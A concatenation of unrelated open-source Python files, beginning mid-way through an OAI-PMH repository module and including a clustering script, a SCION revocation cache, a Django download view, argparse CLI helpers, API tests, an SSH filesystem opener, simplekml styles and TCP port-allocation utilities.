expand with all the set that exist in the DB for a_set in get_all_field_values(CFG_OAI_SET_FIELD): if a_set not in ret: ret[a_set] = (a_set, a_set, '') ## Let's expand with all the supersets for a_set in ret.keys(): while ':' in a_set: try: a_set = a_set.rsplit(":", 1)[0] except AttributeError: a_set = ':'.join(a_set.split(":")[:-1]) if a_set not in ret: ret[a_set] = (a_set, a_set, '') if CFG_OAI_REPOSITORY_GLOBAL_SET_SPEC in ret: ## Let's remove the special global set del ret[CFG_OAI_REPOSITORY_GLOBAL_SET_SPEC] if '' in ret: ## '' is not a valid setSpec but might be in the MARC del ret[''] return ret def check_argd(argd): """ Check OAI arguments Also transform them from lists to strings. """ errors = [] ## no several times the same argument bad_arguments_error = False for param, value in iteritems(argd): if len(value) > 1 and not bad_arguments_error: errors.append(("badArgument", "More than one value specified for the %s argument: %s" % (param, value))) bad_arguments_error = True ## This is needed only once if len(value) > 0: argd[param] = value[0] else: argd[param] = '' ## principal argument required if argd['verb'] not in CFG_VERBS: errors.append(("badVerb", "Illegal OAI verb: %s" % argd['verb'])) ## defined argd for param in argd.keys(): if not param in CFG_VERBS.get(argd['verb'], []) and param != 'verb' \ and not bad_arguments_error: errors.append(("badArgument", "The request includes illegal arguments for the given verb: %s" % param)) bad_arguments_error = True break # Indicate only once ## resumptionToken exclusive if argd.get('resumptionToken', '') != "" and \ len(argd.keys()) != 2 and not bad_arguments_error: errors.append(("badArgument", "The resumptionToken was specified together with other arguments")) bad_arguments_error = True if argd.get('resumptionToken', None) == '': errors.append(("badResumptionToken", "ResumptionToken invalid: %s" % argd.get('resumptionToken', None))) ## datestamp formats if 'from' in argd and \ 'from' in CFG_VERBS.get(argd['verb'], []): from_length = len(argd['from']) if check_date(argd['from']) == "": errors.append(("badArgument", "Bad datestamp format in from: %s" % argd['from'])) else: from_length = 0 if 'until' in argd and \ 'until' in CFG_VERBS.get(argd['verb'], []): until_length = len(argd['until']) if check_date(argd['until']) == "": errors.append(("badArgument", "Bad datestamp format in until: %s" % argd['until'])) else: until_length = 0 if from_length != 0: if until_length != 0: if from_length != until_length: errors.append(("badArgument", "From and until have two different formats: %s Vs. %s" % (from_length, until_length))) if 'from' in argd and 'until' in argd \ and argd['from'] > argd['until'] and \ 'from' in CFG_VERBS.get(argd['verb'], []) and \ 'until' in CFG_VERBS.get(argd['verb'], []): errors.append(("badArgument", "from argument comes after until argument: %s > %s" % (argd['from'], argd['until']))) ## Identify exclusive if argd['verb'] == "Identify" and \ len(argd.keys()) != 1: if not bad_arguments_error: # Do not repeat this error errors.append(("badArgument", "The request includes illegal arguments")) bad_arguments_error = True ## parameters for GetRecord if argd['verb'] == "GetRecord" and \ 'identifier' not in argd: errors.append(("badArgument", "Record identifier missing")) if argd['verb'] == "GetRecord" and \ 'metadataPrefix' not in argd: errors.append(("badArgument", "Missing metadataPrefix")) ## parameters for ListRecords and ListIdentifiers if (argd['verb'] == "ListRecords" or argd['verb'] == "ListIdentifiers") and \ ('resumptionToken' not in argd and 'metadataPrefix' not in argd): errors.append(("badArgument", "Missing metadataPrefix")) ## Metadata prefix defined and valid if 'metadataPrefix' in argd and \ not argd['metadataPrefix'] in CFG_OAI_METADATA_FORMATS: errors.append(("cannotDisseminateFormat", "Chosen format is not supported. Valid formats are: %s" % ', '.join(CFG_OAI_METADATA_FORMATS.keys()))) return errors def oai_profile(): """ Runs a benchmark """ from six import StringIO oai_list_records_or_identifiers(StringIO(), argd={"metadataPrefix": "oai_dc", "verb": "ListRecords"}) oai_list_records_or_identifiers(StringIO(), argd={"metadataPrefix": "marcxml", "verb" :"ListRecords"}) oai_list_records_or_identifiers(StringIO(), argd={"metadataPrefix": "oai_dc", "verb": "ListIdentifiers"}) return if __name__ == "__main__": import profile import pstats profile.run('oai_profile()', "oai_profile") p = pstats.Stats("oai_profile") p.strip_dirs().sort_stats("cumulative").print_stats()
# clustering.py # cluster yelp and TA data # # Rob Churchill # # NOTE: IN ORDER TO GET ANY VISUALIZATIONS OUT OF THIS SCRIPT, # YOU MUST PUT THIS IN AN IPYTHON NOTEBOOK OR SOMETHING SIMILAR # # NOTE: I learned to do this in my data science class last semester. If you are looking for plagiarism things, you will almost certainly find similar clustering code. # I did not copy it, I learned this specific way of doing it, and referred to my previous assignments when doing it for this project. If you would like to see my previous # assignments, I will provide you them on request. Otherwise, I don't think that it's worth adding a lot of extra files for the sole sake of showing that I haven't plagiarized. import scipy as sp import numpy as np import math from sklearn.cluster import KMeans import scipy.cluster.hierarchy as hr from sklearn.cluster import DBSCAN import csv import matplotlib.pyplot as plt import seaborn as sns %matplotlib inline folder = 'data/' file_names = ['yelp_data.csv', 'trip_advisor_data.csv'] yelp_dataset = list() #change the index of file_names in this line to 0 if you want to cluster yelp, 1 if you want to cluster trip advisor with open(folder+file_names[1], 'r') as f: reader = csv.reader(f) for line in reader: yelp_dataset.append(line) # remove headers yelp_dataset.remove(yelp_dataset[0]) # throw out the fields we don't need so that we have enough memory to cluster such a large dataset new_yelp_ds = [] for y in yelp_dataset: local = 0 if y[19] == "TRUE": local = 1 if y[19] in ["FALSE", "TRUE"]: for l in range(0, len(y)): if y[l] == "NA": y[l] = 0 if int(y[11]) > 99: # mean_rating, distance y = [float(y[21]), math.log(float(y[18])+1), math.log(int(y[6])+1)] new_yelp_ds.append(y) # this condensed dataset is now our working dataset yelp_dataset = np.array(new_yelp_ds) print len(yelp_dataset) #print np.amax(yelp_dataset[:,1]) # start kmeans. try it with 1...11 clusters to see which is best. for both, it was two. error = np.zeros(11) error[0] = 0 for k in range(1,11): kmeans = KMeans(n_clusters=k) kmeans.fit_predict(yelp_dataset) centroids = kmeans.cluster_centers_ labels = kmeans.labels_ error[k] = kmeans.inertia_ plt.plot(range(1,len(error)),error[1:]) plt.xlabel('Number of clusters') plt.ylabel('Error') # run kmeans on the optimal k kmeans = KMeans(n_clusters=2, n_init=15) kmeans.fit_predict(yelp_dataset) centroids = kmeans.cluster_centers_ labels = kmeans.labels_ error = kmeans.inertia_ print labels print error # make it pretty and plot it. kmeans told us literally nothing about this dataset. colors = [] for l in labels: if l == 0: colors.append('r') elif l== 1: colors.append('b') elif l == 2: colors.append('g') elif l == 3: colors.append('c') else: colors.append('m') plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0) # set up dbscan, set the eps based on the website # for yelp, use 0.25. For trip advisor use 0.5 dbscan = DBSCAN(eps = 0.5) # run dbscan on the data dbscan.fit_predict(yelp_dataset) labels = dbscan.labels_ print labels # make it pretty and plot it. dbscan highlights some major grouping of reviews in the data, # especially the local and non-local groups. colors = [] for l in labels: if l == 0: colors.append('r') elif l== 1: colors.append('b') elif l == 2: colors.append('g') elif l == 3: colors.append('c') elif l == 4: colors.append('y') else: colors.append('m') plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0) # hierarchical clustering is a very memory consuming algorithm, so we can only take a small subset of the dataset # we randomly permute and take the first 1000. permutation = np.random.permutation(yelp_dataset) small_ds = permutation[:1000] # run the algorithm on our data Z = hr.linkage(small_ds, method='complete', metric='euclidean') print Z.shape, small_ds.shape # plot the dendrogram to see how the clusters were created. fig = plt.figure(figsize=(10,10)) T = hr.dendrogram(Z,color_threshold=0.4, leaf_font_size=1) fig.show() # cluster our data and get the labels for plotting. labels = hr.fcluster(Z, t=7, depth=8) #print labels # make it pretty and plot it. heirarchical clustering, like kmeans, showed us nothing interesting. colors = [] for l in labels: if l == 0: colors.append('r') elif l== 1: colors.append('b') elif l == 2: colors.append('r') elif l == 3: colors.append('c') elif l == 4: colors.append('y') else: colors.append('m') plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0)
# descriptors.__init__ # # Expose Descriptor, Validated, and all descriptors so they can be # imported via "from descriptors import ..." from __future__ import print_function, unicode_literals, division from descriptors.Descriptor import Descriptor from descriptors.Validated import Validated import descriptors.handmade as hm import descriptors.massproduced as mm _all_descriptors = set([ (obj_name, obj) for module in (hm, mm) for obj_name, obj in module.__dict__.items() if obj.__class__.__name__ == "DescriptorMeta"]) _all_descriptors.discard(("Descriptor", Descriptor)) globals().update(_all_descriptors)
# Copyright 2008 German Aerospace Center (DLR) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from webdav.acp.Acl import ACL from webdav.acp.Ace import ACE from webdav.acp.GrantDeny import GrantDeny from webdav.acp.Privilege import Privilege from webdav.acp.Principal import Principal __version__ = "$LastChangedRevision: 2 $"
from setuptools import setup setup( name="mbtapy", version='0.1.0dev1', description='Python bindings for the MBTA-REALTIME API (v2)', author="Joseph Dougherty", author_email="[email protected]", url='https://github.com/JDougherty/mbtapy', install_requires=['requests'], license='LICENSE', packages=['mbtapy'], )
# Copyright 2017 ETH Zurich # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ :mod:`rev_cache` --- Cache for revocations ========================================== """ # Stdlib import logging import threading # External from prometheus_client import Counter, Gauge # SCION from lib.crypto.hash_tree import ConnectedHashTree # Exported metrics. REVS_TOTAL = Gauge("rc_revs_total", "# of cached revocations", ["server_id", "isd_as"]) REVS_BYTES = Gauge("rc_revs_bytes", "RevCache memory usage", ["server_id", "isd_as"]) REVS_ADDED = Counter("rc_revs_added_total", "Total revocations added", ["server_id", "isd_as"]) REVS_REMOVED = Counter("rc_revs_removed_total", "Total revocations removed", ["server_id", "isd_as"]) def _mk_key(rev_info): """Returns the key for a RevocationInfo object.""" return (rev_info.isd_as(), rev_info.p.ifID) class RevCache: """Thread-safe cache for revocations with auto expiration of entries.""" def __init__(self, capacity=1000, labels=None): # pragma: no cover """ :param dict labels: Labels added to the exported metrics. The following labels are supported: - server_id: A unique identifier of the server that is exporting - isd_as: The ISD_AS of where the server is running - type: A generic label for the type of the revocations. """ self._cache = {} self._lock = threading.RLock() self._capacity = capacity self._labels = labels if self._labels: self._init_metrics() def _init_metrics(self): # pragma: no cover REVS_TOTAL.labels(**self._labels).set(0) REVS_BYTES.labels(**self._labels).set(0) REVS_ADDED.labels(**self._labels).inc(0) REVS_REMOVED.labels(**self._labels).inc(0) def __contains__(self, rev_info): # pragma: no cover return self.contains_key(_mk_key(rev_info)) def contains_key(self, key): # pragma: no cover with self._lock: stored_info = self._cache.get(key) return stored_info and self._validate_entry(stored_info) def __getitem__(self, key): # pragma: no cover return self.get(key) def get(self, key, default=None): with self._lock: try: rev_info = self._cache[key] except KeyError: return default if self._validate_entry(rev_info): return rev_info return default def add(self, rev_info): """ Adds rev_info to the cache and returns True if the operation succeeds. """ if ConnectedHashTree.verify_epoch(rev_info.p.epoch) != ConnectedHashTree.EPOCH_OK: return False with self._lock: key = _mk_key(rev_info) stored_info = self.get(key) if not stored_info: # Try to free up space in case the cache reaches the cap limit. if len(self._cache) >= self._capacity: for info in list(self._cache.values()): self._validate_entry(info) # Couldn't free up enough space... if len(self._cache) >= self._capacity: logging.error("Revocation cache full!.") return False self._cache[key] = rev_info if self._labels: REVS_ADDED.labels(**self._labels).inc() REVS_TOTAL.labels(**self._labels).inc() REVS_BYTES.labels(**self._labels).inc(len(rev_info)) return True if rev_info.p.epoch > stored_info.p.epoch: self._cache[key] = rev_info if self._labels: REVS_ADDED.labels(**self._labels).inc() REVS_REMOVED.labels(**self._labels).inc() REVS_BYTES.labels(**self._labels).inc(len(rev_info) - len(stored_info)) return True return False def _validate_entry(self, rev_info, cur_epoch=None): # pragma: no cover """Removes an expired revocation from the cache.""" if (ConnectedHashTree.verify_epoch(rev_info.p.epoch, cur_epoch) != ConnectedHashTree.EPOCH_OK): del self._cache[_mk_key(rev_info)] if self._labels: REVS_REMOVED.labels(**self._labels).inc() REVS_TOTAL.labels(**self._labels).dec() REVS_BYTES.labels(**self._labels).dec(len(rev_info)) return False return True
__author__ = 'romilly' v1 = 1.0 v2 = 1.0 n1 = 1 while v2 > 10e-6: v2 = v2 / n1 v1 = v1 + v2 n1 = n1 + 1 print v1
#!/usr/bin/env python3 """inject_repos.py - CI secret repos injection. """ import yaml from lxml import etree from lxml.etree import ElementTree as ET import argparse from six import iteritems def main(): repos_file, beaker_file = parse_args() repos = load_secret_data(repos_file) inject_repos(repos, beaker_file) def parse_args(): description_msg = 'Resolve and filter secret data' parser = argparse.ArgumentParser(description=description_msg) parser.add_argument( "-f", "--secret-file", type=str, help=("Path to secret file.") ) parser.add_argument( "-b", "--beaker-file", type=str, help=("Path to beaker file.") ) args = parser.parse_args() return args.secret_file, args.beaker_file def load_secret_data(file_to_load=None): """Load yaml file from a given location :param str file_to_load: (optional) Path to the file we need to load. :rtype: list :returns: A list with the file's data. An empty list if data was not found. """ try: with open(file_to_load, 'r') as sf: return yaml.safe_load(sf) except IOError: return [] def inject_repos(repos, beaker_file): parser = etree.XMLParser(strip_cdata=False) tree = etree.parse(beaker_file, parser) root = tree.getroot() for repo_name, url in iteritems(repos): etree.SubElement(root[1][0][4], "repo", attrib={"name": repo_name, "url": url}) tree.write( beaker_file, pretty_print=True, xml_declaration=True, encoding="utf-8" ) if __name__ == "__main__": main()
######################################################################################################################## # VECNet CI - Prototype # Date: 03/21/2014 # Institution: University of Notre Dame # Primary Authors: # Robert Jones <[email protected]> ######################################################################################################################## from django.core.exceptions import ObjectDoesNotExist from django.http import HttpResponse, HttpResponseBadRequest from lib.templatetags.base_extras import set_notification def download_view(request, file_type=None): """ ## View for file downloads ## - Given a file_type, return the file of that type from the scenario in the session. filetypes = [ 'air binary', 'air json', 'humidity binary', 'humidity json', 'land_temp binary', 'land_temp json', 'rainfall binary', 'rainfall json', 'config', 'campaign', 'demographics', ] """ if file_type is None: return HttpResponseBadRequest('No file selected for download.') if 'scenario' not in request.session.keys(): return HttpResponseBadRequest('No scenario selected to download from.') try: my_file = request.session['scenario'].get_file_by_type(file_type) except ObjectDoesNotExist: set_notification('alert-error', '<strong>Error!</strong> File does not exist.', request.session) return HttpResponseBadRequest('Scenario does not contain a file of this type.') response = HttpResponse(mimetype='text/plain') response['Content-Disposition'] = 'attachment; filename="%s"' % my_file.file_name response.write(my_file.content) return response
from distutils.core import setup from distutils.extension import Extension from Cython.Distutils import build_ext setup( cmdclass = {'build_ext' : build_ext}, ext_modules=[Extension("_snaphu", sources=["_snaphu.pyx", "../src/snaphu.c", "../src/snaphu_solver.c", "../src/snaphu_util.c", "../src/snaphu_cost.c", "../src/snaphu_cs2.c", "../src/snaphu_io.c", "../src/snaphu_tile.c"], include_dirs=['../src'], extra_compile_args=['-Wstrict-prototypes', ], language="c")] )
""" JsonCli: Library for CLI based on JSON -------------------------------------- +------------------------+-------------+ | This is the JsonCli common library. | +------------------------+-------------+ """ import argparse from collections import OrderedDict from argcomplete import autocomplete from botocore import xform_name type_map = { 'structure': str, 'map': str, 'timestamp': str, 'list': str, 'string': str, 'float': float, 'integer': int, 'long': int, 'boolean': bool, 'double': float, 'blob': str} class OrderNamespace(argparse.Namespace): """ Namespace with Order: from argparse.Namespace """ __order__ = OrderedDict() def __init__(self, **kwargs): super(OrderNamespace, self).__init__(**kwargs) def __setattr__(self, attr, value): if value is not None: self.__order__[attr] = value super(OrderNamespace, self).__setattr__(attr, value) def add_arguments(group, args): """ Add Arguments to CLI """ for kkk, vvv in args.iteritems(): if 'type' in vvv and vvv['type'] in type_map: vvv['type'] = type_map[vvv['type']] if 'help' in vvv and not vvv['help']: vvv['help'] = argparse.SUPPRESS changed = xform_name(kkk, "-") if kkk != changed: kkk = "-".join(["", changed]) group.add_argument(kkk, **vvv) return group def recursive_parser(parser, args): """ Recursive CLI Parser """ subparser = parser.add_subparsers(help=args.get( '__help__', ''), dest=args.get('__dest__', '')) for k, v in args.iteritems(): if k == '__help__' or k == '__dest__': continue group = subparser.add_parser(k, help=v.get('help', '')) for kk, vv in v.iteritems(): if kk == 'Subparsers': group = recursive_parser(group, vv) elif kk == 'Arguments': group = add_arguments(group, vv) return parser def parse_args(args): """ Create the Command Line Interface :type args: dict :param args: describes the command structure for the CLI """ parser = argparse.ArgumentParser(description=args.get('Description', '')) for k, v in args.iteritems(): if k == 'Subparsers': parser = recursive_parser(parser, v) elif k == 'Arguments': parser = add_arguments(parser, v) autocomplete(parser) return parser.parse_args(None, OrderNamespace()) # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Hewlett-Packard Development Company, L.P. # # Author: Kiall Mac Innes <[email protected]> # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_config import cfg from designate.tests.test_api.test_v2 import ApiV2TestCase class ApiV2LimitsTest(ApiV2TestCase): def test_get_limits(self): response = self.client.get('/limits/') self.assertEqual(200, response.status_int) self.assertEqual('application/json', response.content_type) self.assertIn('max_zones', response.json) self.assertIn('max_zone_records', response.json) self.assertIn('max_zone_recordsets', response.json) self.assertIn('max_recordset_records', response.json) self.assertIn('min_ttl', response.json) self.assertIn('max_zone_name_length', response.json) self.assertIn('max_recordset_name_length', response.json) self.assertIn('max_page_limit', response.json) absolutelimits = response.json self.assertEqual(cfg.CONF.quota_zones, absolutelimits['max_zones']) self.assertEqual(cfg.CONF.quota_zone_records, absolutelimits['max_zone_recordsets']) self.assertEqual(cfg.CONF['service:central'].min_ttl, absolutelimits['min_ttl']) self.assertEqual(cfg.CONF['service:central'].max_zone_name_len, absolutelimits['max_zone_name_length']) self.assertEqual(cfg.CONF['service:central'].max_recordset_name_len, absolutelimits['max_recordset_name_length']) self.assertEqual(cfg.CONF['service:api'].max_limit_v2, absolutelimits['max_page_limit'])
def test_connect(client, connect): """Connect client triggers client_connect""" connect() assert client.triggers['CLIENT_CONNECT'] == 1 def test_ping_pong(client, server, connect, flush): connect() server.write("PING :ping-message") client.send("PONG") # Protocol doesn't advance until loop flushes assert not client.triggers["PING"] assert not server.received flush() flush() # Both should have been received now assert client.triggers["PING"] == 1 assert server.received == ["PONG"]
# coding: utf-8 from __future__ import unicode_literals from __future__ import absolute_import import configparser import six from .base import Opener from .registry import registry from ..subfs import ClosingSubFS from ..errors import FSError, CreateFailed __license__ = "LGPLv2+" __copyright__ = "Copyright (c) 2017-2021 Martin Larralde" __author__ = "Martin Larralde <[email protected]>" __version__ = __version__ = ( __import__("pkg_resources") .resource_string("fs.sshfs", "_version.txt") .strip() .decode("ascii") ) class SSHOpener(Opener): protocols = ['ssh'] @staticmethod def open_fs(fs_url, parse_result, writeable, create, cwd): from ..sshfs import SSHFS ssh_host, _, dir_path = parse_result.resource.partition('/') ssh_host, _, ssh_port = ssh_host.partition(':') ssh_port = int(ssh_port) if ssh_port.isdigit() else 22 params = configparser.ConfigParser() params.read_dict({'sshfs':getattr(parse_result, 'params', {})}) ssh_fs = SSHFS( ssh_host, user=parse_result.username, passwd=parse_result.password, pkey=params.get('sshfs', 'pkey', fallback=None), timeout=params.getint('sshfs', 'timeout', fallback=10), port=ssh_port, keepalive=params.getint('sshfs', 'keepalive', fallback=10), compress=params.getboolean('sshfs', 'compress', fallback=False), config_path=\ params.get('sshfs', 'config_path', fallback='~/.ssh/config'), exec_timeout=params.getint('sshfs', 'timeout', fallback=None), ) try: if dir_path: if create: ssh_fs.makedirs(dir_path, recreate=True) return ssh_fs.opendir(dir_path, factory=ClosingSubFS) else: return ssh_fs except Exception as err: six.raise_from(CreateFailed, err) registry.install(SSHOpener)
""" Copyright 2011-2014-2012 Kyle Lancaster This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Contact me at [email protected] """ from simplekml.base import Kmlable, check from simplekml.substyle import IconStyle, LabelStyle, LineStyle, PolyStyle, BalloonStyle, ListStyle class StyleSelector(Kmlable): """Abstract style class, extended by :class:`simplekml.Style` and :class:`simplekml.StyleMap` There are no arguments. """ _id = 0 def __init__(self): super(StyleSelector, self).__init__() self._id = "stylesel_{0}".format(StyleSelector._id) StyleSelector._id += 1 @property def id(self): """The id of the style, read-only.""" return self._id class Style(StyleSelector): """Styles affect how Geometry is presented. Arguments are the same as the properties. Usage:: import simplekml kml = simplekml.Kml() pnt = kml.newpoint(name='A Point') pnt.coords = [(1.0, 2.0)] pnt.style.labelstyle.color = simplekml.Color.red # Make the text red pnt.style.labelstyle.scale = 2 # Make the text twice as big pnt.style.iconstyle.icon.href = 'http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png' kml.save("Style.kml") """ def __init__(self, iconstyle=None, labelstyle=None, linestyle=None, polystyle=None, balloonstyle=None, liststyle=None): super(Style, self).__init__() self._kml["IconStyle_"] = iconstyle self._kml["LabelStyle_"] = labelstyle self._kml["LineStyle_"] = linestyle self._kml["PolyStyle_"] = polystyle self._kml["BalloonStyle"] = balloonstyle self._kml["ListStyle"] = liststyle def __str__(self): return '<Style id="{0}">{1}</Style>'.format(self._id, super(Style, self).__str__()) @property def iconstyle(self): """The iconstyle, accepts :class:`simplekml.IconStyle`.""" if self._kml["IconStyle_"] is None: self._kml["IconStyle_"] = IconStyle() return self._kml["IconStyle_"] @iconstyle.setter @check(IconStyle) def iconstyle(self, iconstyle): self._kml["IconStyle_"] = iconstyle @property def labelstyle(self): """The labelstyle, accepts :class:`simplekml.LabelStyle`.""" if self._kml["LabelStyle_"] is None: self._kml["LabelStyle_"] = LabelStyle() return self._kml["LabelStyle_"] @labelstyle.setter @check(LabelStyle) def labelstyle(self, labelstyle): self._kml["LabelStyle_"] = labelstyle @property def linestyle(self): """The linestyle, accepts :class:`simplekml.LineStyle`.""" if self._kml["LineStyle_"] is None: self._kml["LineStyle_"] = LineStyle() return self._kml["LineStyle_"] @linestyle.setter @check(LineStyle) def linestyle(self, linestyle): self._kml["LineStyle_"] = linestyle @property def polystyle(self): """The polystyle, accepts :class:`simplekml.PolyStyle`.""" if self._kml["PolyStyle_"] is None: self._kml["PolyStyle_"] = PolyStyle() return self._kml["PolyStyle_"] @polystyle.setter @check(PolyStyle) def polystyle(self, polystyle): self._kml["PolyStyle_"] = polystyle @property def balloonstyle(self): """The balloonstyle, accepts :class:`simplekml.BalloonStyle`.""" if self._kml["BalloonStyle"] is None: self._kml["BalloonStyle"] = BalloonStyle() return self._kml["BalloonStyle"] @balloonstyle.setter @check(BalloonStyle) def balloonstyle(self, balloonstyle): self._kml["BalloonStyle"] = balloonstyle @property def liststyle(self): """The liststyle, accepts :class:`simplekml.ListStyle`.""" if self._kml["ListStyle"] is None: self._kml["ListStyle"] = ListStyle() return self._kml["ListStyle"] @liststyle.setter @check(ListStyle) def liststyle(self, liststyle): self._kml["ListStyle"] = liststyle class StyleMap(StyleSelector): """Styles affect how Geometry is presented. Arguments are the same as the properties. Usage:: import simplekml kml = simplekml.Kml() pnt = kml.newpoint(coords=[(18.432314,-33.988862)]) pnt.stylemap.normalstyle.labelstyle.color = simplekml.Color.blue pnt.stylemap.highlightstyle.labelstyle.color = simplekml.Color.red kml.save("StyleMap.kml") """ def __init__(self, normalstyle=None, highlightstyle=None): super(StyleMap, self).__init__() self._pairnormal = None self._pairhighlight = None self.normalstyle = normalstyle self.highlightstyle = highlightstyle def __str__(self): buf = ['<StyleMap id="{0}">'.format(self._id), super(StyleMap, self).__str__()] if self._pairnormal is not None: buf.append("<Pair>") buf.append("<key>normal</key>") buf.append("<styleUrl>#{0}</styleUrl>".format(self._pairnormal._id)) buf.append("</Pair>") if self._pairhighlight is not None: buf.append("<Pair>") buf.append("<key>highlight</key>") buf.append("<styleUrl>#{0}</styleUrl>".format(self._pairhighlight._id)) buf.append("</Pair>") buf.append("</StyleMap>") return "".join(buf) @property def normalstyle(self): """The normal :class:`simplekml.Style`, accepts :class:`simplekml.Style`.""" if self._pairnormal is None: self._pairnormal = Style() return self._pairnormal @normalstyle.setter @check(Style) def normalstyle(self, normal): self._pairnormal = normal @property def highlightstyle(self): """The highlighted :class:`simplekml.Style`, accepts :class:`simplekml.Style`.""" if self._pairhighlight is None: self._pairhighlight = Style() return self._pairhighlight @highlightstyle.setter @check(Style) def highlightstyle(self, highlighturl): self._pairhighlight = highlighturl
# Programmer friendly subprocess wrapper. # # Author: Peter Odding <[email protected]> # Last Change: March 2, 2020 # URL: https://executor.readthedocs.io """ Miscellaneous TCP networking functionality. The functionality in this module originated in the :class:`executor.ssh.server` module with the purpose of facilitating a robust automated test suite for the :class:`executor.ssh.client` module. While working on SSH tunnel support I needed similar logic again and I decided to extract this code from the :class:`executor.ssh.server` module. """ # Standard library modules. import itertools import logging import random import socket # Modules included in our package. from executor import ExternalCommand # External dependencies. from humanfriendly import Timer, format_timespan from humanfriendly.terminal.spinners import Spinner from humanfriendly.text import format, pluralize from property_manager import ( PropertyManager, lazy_property, mutable_property, required_property, set_property, ) # Public identifiers that require documentation. __all__ = ( 'EphemeralPortAllocator', 'EphemeralTCPServer', 'TimeoutError', 'WaitUntilConnected', 'logger', ) # Initialize a logger. logger = logging.getLogger(__name__) class WaitUntilConnected(PropertyManager): """Wait for a TCP endpoint to start accepting connections.""" @mutable_property def connect_timeout(self): """The timeout in seconds for individual connection attempts (a number, defaults to 2).""" return 2 @property def endpoint(self): """A human friendly representation of the TCP endpoint (a string containing a URL).""" return format("%s://%s:%i", self.scheme, self.hostname, self.port_number) @mutable_property def hostname(self): """The host name or IP address to connect to (a string, defaults to ``localhost``).""" return 'localhost' @property def is_connected(self): """:data:`True` if a connection was accepted, :data:`False` otherwise.""" timer = Timer() logger.debug("Checking whether %s is accepting connections ..", self.endpoint) try: socket.create_connection((self.hostname, self.port_number), self.connect_timeout) logger.debug("Yes %s is accepting connections (took %s).", self.endpoint, timer) return True except Exception: logger.debug("No %s isn't accepting connections (took %s).", self.endpoint, timer) return False @required_property def port_number(self): """The port number to connect to (an integer).""" @mutable_property def scheme(self): """A URL scheme that indicates the purpose of the ephemeral port (a string, defaults to 'tcp').""" return 'tcp' @mutable_property def wait_timeout(self): """The timeout in seconds for :func:`wait_until_connected()` (a number, defaults to 30).""" return 30 def wait_until_connected(self): """ Wait until connections are being accepted. :raises: :exc:`TimeoutError` when the SSH server isn't fast enough to initialize. """ timer = Timer() with Spinner(timer=timer) as spinner: while not self.is_connected: if timer.elapsed_time > self.wait_timeout: raise TimeoutError(format( "Failed to establish connection to %s within configured timeout of %s!", self.endpoint, format_timespan(self.wait_timeout), )) spinner.step(label="Waiting for %s to accept connections" % self.endpoint) spinner.sleep() logger.debug("Waited %s for %s to accept connections.", timer, self.endpoint) class EphemeralPortAllocator(WaitUntilConnected): """ Allocate a free `ephemeral port number`_. .. _ephemeral port number: \ http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers#Dynamic.2C_private_or_ephemeral_ports """ @lazy_property def port_number(self): """A dynamically selected free ephemeral port number (an integer between 49152 and 65535).""" timer = Timer() logger.debug("Looking for free ephemeral port number ..") for i in itertools.count(1): value = self.ephemeral_port_number set_property(self, 'port_number', value) if not self.is_connected: logger.debug("Found free ephemeral port number %s after %s (took %s).", value, pluralize(i, "attempt"), timer) return value @property def ephemeral_port_number(self): """A random ephemeral port number (an integer between 49152 and 65535).""" return random.randint(49152, 65535) class EphemeralTCPServer(ExternalCommand, EphemeralPortAllocator): """ Make it easy to launch ephemeral TCP servers. The :class:`EphemeralTCPServer` class makes it easy to allocate an `ephemeral port number`_ that is not (yet) in use. .. _ephemeral port number: \ http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers#Dynamic.2C_private_or_ephemeral_ports """ @property def asynchronous(self): """Ephemeral TCP servers always set :attr:`.ExternalCommand.asynchronous` to :data:`True`.""" return True def start(self, **options): """ Start the TCP server and wait for it to start accepting connections. :param options: Any keyword arguments are passed to the :func:`~executor.ExternalCommand.start()` method of the superclass. :raises: Any exceptions raised by :func:`~executor.ExternalCommand.start()` and :func:`~executor.tcp.WaitUntilConnected.wait_until_connected()`. If the TCP server doesn't start accepting connections within the configured timeout (see :attr:`~executor.tcp.WaitUntilConnected.wait_timeout`) the process will be terminated and the timeout exception is propagated. """ if not self.was_started: logger.debug("Preparing to start %s server ..", self.scheme.upper()) super(EphemeralTCPServer, self).start(**options) try: self.wait_until_connected() except TimeoutError: self.terminate() raise class TimeoutError(Exception): """ Raised when a TCP server doesn't start accepting connections quickly enough. This exception is raised by :func:`~executor.tcp.WaitUntilConnected.wait_until_connected()` when the TCP server doesn't start accepting connections within a reasonable time. """
